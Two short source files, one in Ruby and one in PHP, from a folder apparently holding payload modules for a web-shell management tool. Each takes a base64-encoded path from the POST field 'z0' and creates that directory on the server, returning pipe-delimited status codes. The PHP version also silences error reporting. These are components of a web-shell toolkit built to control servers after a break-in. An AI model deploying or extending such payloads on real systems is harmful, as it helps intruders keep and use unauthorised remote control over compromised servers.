File: Payload/Ruby/CGI/OneShell/file_mkdir.rb
require 'base64'
require 'fileutils'

def main
  dir_name = Base64.decode64($_POST['z0'].to_s)

  if Dir.exist?(dir_name)
    print "0|Folder already exists"
    return
  end

  begin
    FileUtils.mkdir_p(dir_name, mode: 0755)
    print "1|"
  rescue => e
    print "0|Failed to create folder."
  end
end

main

File: Payload/PHP/v8.X/ECDH/file_mkdir.php
<?php

@error_reporting(0);

function main() {
    $dir_name = base64_decode($_POST['z0']);
    if (is_dir($dir_name)) {
        echo('0|Folder already exists');
        return;
    }

    if (mkdir($dir_name, 0755, true)) {
        echo('1|');
    } else {
        echo('0|Failed to create folder.');
    }
}

main();

?>